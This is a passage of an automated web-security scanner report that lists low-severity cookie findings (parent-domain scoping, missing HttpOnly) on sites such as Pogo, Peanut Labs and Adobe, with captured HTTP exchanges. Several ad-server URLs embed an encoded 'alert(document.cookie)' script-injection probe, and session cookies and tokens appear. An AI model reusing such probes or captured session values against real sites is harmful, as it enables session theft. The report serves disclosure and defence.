The following cookies were issued by the application and is scoped to a parent of the issuing domain:- geolocn=MTczLjE5My4y
MTQuMjQzOjg0MDo2MjM%3D; expires=Tue, 08-Feb-2011 01:43:55 GMT; path=/; domain=.gamespot.com - ctk=NGQyOTEyZGJhZGMx
ZDZmMzEyMjkyNmUwMDViNQ%3D %3D; expires=Fri, 08-Jul-2011 01:43:55 GMT; path=/; domain=.gamespot.com
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:43:55 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.2.5 Set-Cookie: geolocn=MTczLjE5My4y Set-Cookie: ctk=NGQyOTEyZGJhZGMx Set-Cookie: gspot_promo_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com Set-Cookie: gspot_side_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com Keep-Alive: timeout=300, max=994 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 98766 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.63. http://www.peanutlabs.com/core.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /core.php |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- pl_email=test4%40fastdial
.net; expires=Tue, 08-Feb-2011 01:34:42 GMT; path=/; domain=.peanutlabs.com
Request
GET /core.php?coreClass=IdCmd Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:34:42 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_email=test4%40fastdial Vary: Accept-Encoding,User Content-Type: text/javascript Content-Length: 26985 {"uid":"12633542","user ...[SNIP]... |
9.64. http://www.peanutlabs.com/pl/profileSurveyRegister.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /pl/profileSurveyRegister |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- pl_user_id=8939b981e2
-5329197bbf0fb46f475 fdce27e545262; expires=Mon, 09-Jan-2012 01:34:41 GMT; path=/; domain=.peanutlabs.com - pl_profile=deleted; expires=Sat, 09-Jan-2010 01:34:40 GMT; path=/; domain=.peanutlabs.com
Request
GET /pl/profileSurveyRegister Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:34:41 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_user_id=8939b981e2 Set-Cookie: pl_profile=deleted; expires=Sat, 09-Jan-2010 01:34:40 GMT; path=/; domain=.peanutlabs.com Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 2467 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... |
9.65. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /publisher/dashboard2 |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- ext_cid=deleted; expires=Sat, 09-Jan-2010 01:35:39 GMT; path=/; domain=.peanutlabs.com
Request
GET /publisher/dashboard2 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www1.peanutlabs Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:35:39 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ext_cid=deleted; expires=Sat, 09-Jan-2010 01:35:39 GMT; path=/; domain=.peanutlabs.com Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 2293 <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Peanut Labs Media Publisher Dashboard</title> <script src="AC_OETags.js" language="javascript" ...[SNIP]... |
9.66. http://www.pogo.com/action/pogo/lightreg.do previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/lightreg.do |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- com.pogo.lkey=TRB7pR
5Zmd6Ko2z1Cn4zUAAAKMQ.; Domain=.pogo.com; Path=/
Request
POST /action/pogo/lightreg.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Cache-Control: max-age=0 Origin: http://www.pogo.com Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD Content-Length: 210 site=pogo&screenname ...[SNIP]... |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.site=pogo; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:11 GMT; Path=/login Set-Cookie: com.pogo.lkey=TRB7pR Set-Cookie: com.pogo.tafrcode=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Location: http://www.pogo.com/login Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:26:10 GMT Server: Apache-Coyote/1.1 |
9.67. http://www.pogo.com/games/connect.jsp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /games/connect.jsp |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- com.pogo.recent=scrabble
.2player.social.17fbdp; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:34:04 GMT; Path=/games/
Request
GET /games/connect.jsp?game Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.nsc=age.:sort |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.recent=scrabble Location: http://game3.pogo.com Content-Length: 0 Date: Sun, 09 Jan 2011 01:34:03 GMT Server: Apache-Coyote/1.1 |
9.68. http://www.pogo.com/games/scrabble previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /games/scrabble |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- com.pogo.nsc=age.:sort
.favdown:va.false :scrabble.2player .beginner:; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:29:48 GMT; Path=/games/
Request
GET /games/scrabble Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.nsc=age.:sort Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:29:47 GMT Server: Apache-Coyote/1.1 Content-Length: 59330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.69. http://www.pogo.com/login/entry.jsp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /login/entry.jsp |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- com.pogo.lkey=TRB7pR
5lcxMFFwWzCn4zTAAAKME.; Domain=.pogo.com; Path=/
Request
GET /login/entry.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.lkey=TRB7pR Location: http://www.pogo.com/ Content-Length: 0 Date: Sun, 09 Jan 2011 01:52:09 GMT Server: Apache-Coyote/1.1 |
9.70. http://www.pogo.com/login/pogo/setCookie.do previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /login/pogo/setCookie.do |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- com.pogo.info=1A06DD
6489046E8C5400B01BCD C200C5C740894EE1C1D5 4B9D6337ECAA3BC8AA9E 96C90EB8BD479A84B5EA E5F7FFE0276A4654905B 9B0F27BA3BCEA9A972CD 5BBA61610C9A8736A7BE 0F37B01924BD04B761D8 77642A78CFB4C56CAE92 4D0222579F2238A5B7AF DCAF21A40BDF3AD46495 DF9940B114E1282F07B7 5AC2B359A34804B80F29 00E0845400B01BCDC200 C5C740894EE1C1D54B9D 6337ECAA3BC8AA9E96C9 0EB8BD479A84B5EAE5F7 FFE0276A4654905B9B0F 27BA3BCEA9A972CD5BBA 61610C9A8736A7BE0F37 B01924BD04C8EBFDFE58 6AD587680A170C3EDC16 1B48B80C858E980A71; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:12 GMT; Path=/login
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.site=pogo; prod.JID=269399119AD |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.info=1A06DD Location: http://www.pogo.com Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:26:11 GMT Server: Apache-Coyote/1.1 |
9.71. https://www.pogo.com/fbconnect/js.do previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /fbconnect/js.do |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- prod.JID=C0E6107E929
4EBED951A4EC6E886F7B9 .000257; Domain=.pogo.com; Path=/
Request
GET /fbconnect/js.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: https://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=C0E6107E929 Content-Language: en-US Location: https://www.pogo.com Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:47:02 GMT Server: Apache-Coyote/1.1 |
10. Cookie without HttpOnly flag set previous next
There are 97 instances of this issue:
- http://ads.adxpose.com/ads/ads.js
- http://diythemes.com/thesis/
- http://event.adxpose.com/event.flow
- http://online.wsj.com/article/SB100014240
52748704415104576066 830729058232.html - http://www.43things.com/person/
- http://www.adbrite.com/mb/commerce/purchase
_form.php - http://www.adobe.com/cfusion/exchange/
- http://www.adobe.com/cfusion/marketplace
/index.cfm - http://www.adobe.com/cfusion/membership/index
.cfm - http://www.adobe.com/cfusion/membership
/logout.cfm - http://www.adobe.com/cfusion/partnerportal
/index.cfm - http://www.adobe.com/cfusion/showcase/index
.cfm - http://www.adobe.com/cfusion/store/html/index
.cfm - http://www.adobe.com/cfusion/support/index
.cfm - http://www.adobe.com/events/main.jsp
- http://www.freshnews.com/news/388192/peanut-labs
-inc-announces-acqui sition-e-rewards-inc- - http://www.peanutlabs.com/peanutlabs/
- http://www.peanutlabs.com/userGreeting.php
- http://www.pixeltrack66.com/mt/w2643334g4y223/
- http://www.thedailynews.cc/
- http://ad.doubleclick.net/click
- http://ad.turn.com/server/pixel.htm
- http://altfarm.mediaplex.com/ad/js/55290
- http://b.scorecardresearch.com/b
- http://b.scorecardresearch.com/p
- http://b.scorecardresearch.com/r
- http://board-games.pogo.com/
- http://board-games.pogo.com/games/monopoly
- http://board-games.pogo.com/games/online-chess
- http://board-games.pogo.com/games/risk
- http://bs.serving-sys.com/BurstingPipe/Banner
Source.asp - http://bs.serving-sys.com/BurstingPipe/Banner
Source.asp - http://bs.serving-sys.com/BurstingPipe/Bursti
ngInteractionsPipe.asp - http://bs.serving-sys.com/BurstingPipe/adServer.bs
- http://card-games.pogo.com/
- http://card-games.pogo.com/games/cribbage
- http://card-games.pogo.com/games/rainy-day-spider
-solitaire - http://click.linksynergy.com/fs-bin/stat
- http://clubpogo-games.pogo.com/
- http://flash-games.pogo.com/
- http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
- http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
- http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js
- http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
- http://puzzle-games.pogo.com/
- http://puzzle-games.pogo.com/games/bejeweled2
- http://puzzle-games.pogo.com/games/yahtzee-party
- http://r.turn.com/server/pixel.htm
- http://r1.ace.advertising.com/click/site=0000758630
/mnum=0000906164/cstr =52607936=_4d290f90 ,0846642328,758630^906164 ^1^0,1_/xsxdata=$xsxdata /bnum=52607936/optn=64 - http://r1.ace.advertising.com/site=755399/size=300250
/u=2/bnum=72318651/hr=19 /hl=2/c=3/scres=5/swh =1920x1200/tile=2/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.mlive.com%252F %253Fdb83d%2527-alert %2528document.cookie%2529 -%2527e027fe9bbf5%253D1 - http://r1.ace.advertising.com/site=758630/size=160600
/u=2/bnum=52607936/hr=19 /hl=3/c=3/scres=5/swh =1920x1200/tile=1/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.pogo.com %252Fgames%252Fscrabble %253FpageSection%253Dfree _home_hot_games1_pl _scrabble - http://r1.ace.advertising.com/site=777340/size=300600
/u=2/bnum=17871065/hr=19 /hl=2/c=3/scres=5/swh =1920x1200/tile=1/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.mlive.com%252F - http://r1.ace.advertising.com/site=777340/size=300600
/u=2/bnum=49979532/hr=19 /hl=2/c=3/scres=5/swh =1920x1200/tile=1/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.mlive.com%252F %253Fdb83d%2527-alert %2528document.cookie%2529 -%2527e027fe9bbf5%253D1 - http://www.bbc.co.uk/news/technology-12126880
- http://www.e00.peanutlabs.com/IMG/parent_company.logo
_url_medium.80x200.1 .1248929690.jpg - http://www.e00.peanutlabs.com/favicon.ico
- http://www.e00.peanutlabs.com/js/iFrame/index.php
- http://www.e00.peanutlabs.com/js/images/languages/icon
_world.png - http://www.e00.peanutlabs.com/recvMid.php
- http://www.ea.com/
- http://www.ea.com/hasbro
- http://www.ea.com/ipad
- http://www.ea.com/iphone
- http://www.ea.com/mobile
- http://www.ea.com/platform/online-games
- http://www.ea.com/platform/pc-games
- http://www.ea.com/platform/ps3-games
- http://www.ea.com/platform/xbox-360-games
- http://www.ea.com/wii
- http://www.facebook.com/
- http://www.facebook.com/2008/fbml
- http://www.facebook.com/Pogo
- http://www.facebook.com/event.php
- http://www.facebook.com/logout.php
- http://www.facebook.com/pages/Packet-Storm
-Security/116613458352817 - http://www.facebook.com/peanutlabs
- http://www.facebook.com/sitetour/connect.php
- https://www.facebook.com/login.php
- http://www.gamespot.com/
- http://www.intellicast.com/
- http://www.intellicast.com/Local/Weather.aspx
- http://www.intellicast.com/Travel/CheapFlights
Widget.htm - http://www.intellicast.com/favicon.ico
- http://www.peanutlabs.com/core.php
- http://www.peanutlabs.com/pl/profileSurveyRegister
.php - http://www.peanutlabs.com/publisher/dashboard2
/PublisherDashboard.php - http://www.pixeltrack66.com/mt/03745344/&subid1
=MQExit&subid2=CD99 &subid3=409&web_id =e99MQExit&orig=CD99&s =MQExit&c=409 - http://www.pixeltrack66.com/mt/03745344/&subid1
=MQExit&subid2=CD99 &subid3=409&web_id =e99MQExitPop&orig=CD99&s =MQExit&c=409 - http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1
=MQThankYou&subid2=CD99 &subid3=409&subid4= - http://www.pogo.com/action/pogo/lightreg.do
- http://www.pogo.com/games/connect.jsp
- http://www.pogo.com/games/scrabble
- http://www.pogo.com/login/entry.jsp
- http://www.pogo.com/login/pogo/setCookie.do
- https://www.pogo.com/fbconnect/js.do
- http://www.rockband.com/
- http://www.xanga.com/
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
10.1. http://ads.adxpose.com/ads/ads.js previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://ads.adxpose.com |
Path: | /ads/ads.js |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- JSESSIONID=C8DDA40C8
F4C2B65082C50B995B886FC; Path=/ - evlu=9f6f0757-8308-4d33
-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/
Request
GET /ads/ads.js?uid Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C8DDA40C8 ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=9f6f0757-8308-4d33 Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:46 GMT Connection: close if(typeof __ADXPOSE_CONTAINERS__=== ...[SNIP]... |
10.2. http://diythemes.com/thesis/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://diythemes.com |
Path: | /thesis/ |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PHPSESSID=131fd88d10
12eb5a5b3d87a3d5024cda; path=/
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=131fd88d10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://diythemes.com Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... |
10.3. http://event.adxpose.com/event.flow previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://event.adxpose.com |
Path: | /event.flow |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- JSESSIONID=513148566
CAD5DDB4E79FD10B3255E39; Path=/
Request
GET /event.flow HTTP/1.1 Host: event.adxpose.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=050A46D4E |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=513148566 Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:14:29 GMT Connection: close |
10.4. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://online.wsj.com |
Path: | /article/SB100014240 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
- djcs_route=aa545813-1265
-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 - DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
- wsjregion=na%2cus; path=/; domain=.wsj.com
Request
GET /article/SB100014240 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.5. http://www.43things.com/person/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.43things.com |
Path: | /person/ |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- _session_id=c7e240c8
34b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ - ubid=ShCp%2FqO8Bd
%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT - auth=Zaocciefe2iud12
Jq25sodTcu2vit7TjegQ eSYLGVdilfdfNS7JNv0g ado1gfauX2reopc1qxAe qCAoyKTVvomHrTkdZTDb 6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd Set-Cookie: auth=Zaocciefe2iud12 Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c8 Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>43 Things</title> <m ...[SNIP]... |
10.6. http://www.adbrite.com/mb/commerce/purchase_form.php previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adbrite.com |
Path: | /mb/commerce/purchase |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- ADBRITE_SESS_1=20vl1
tpukh23pji2agsn60lh44; expires=Mon, 17 Jan 2011 02:58:24 GMT; path=/; domain=www.adbrite.com
Request
GET /mb/commerce/purchase Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Sun, 09 Jan 2011 02:58:24 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://www.adbrite.com/ Pragma: no-cache Server: Apache Set-Cookie: ADBRITE_SESS_1=20vl1 Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:24 GMT; path=/ Content-Length: 3 Connection: close |
10.7. http://www.adobe.com/cfusion/exchange/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.adobe.com |
Path: | /cfusion/exchange/ |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CFID=7126392;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/
- CFTOKEN=132e3b7190093aee
-1C5C204D-EC18-7019 -3906CCE757EA8849;expires =Tue, 01-Jan-2041 05:25:22 GMT;path=/ - DYLANSESSIONID=48306
eaaf197ace953b045925 29724475551;path=/ - UID=1C5C2077%2D9490
%2D3BC1%2D91B37A414A 682C30;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/cfusion/ - DylanApp-BigIP=223114250
.24610.0000; path=/
Request
GET /cfusion/exchange/ HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
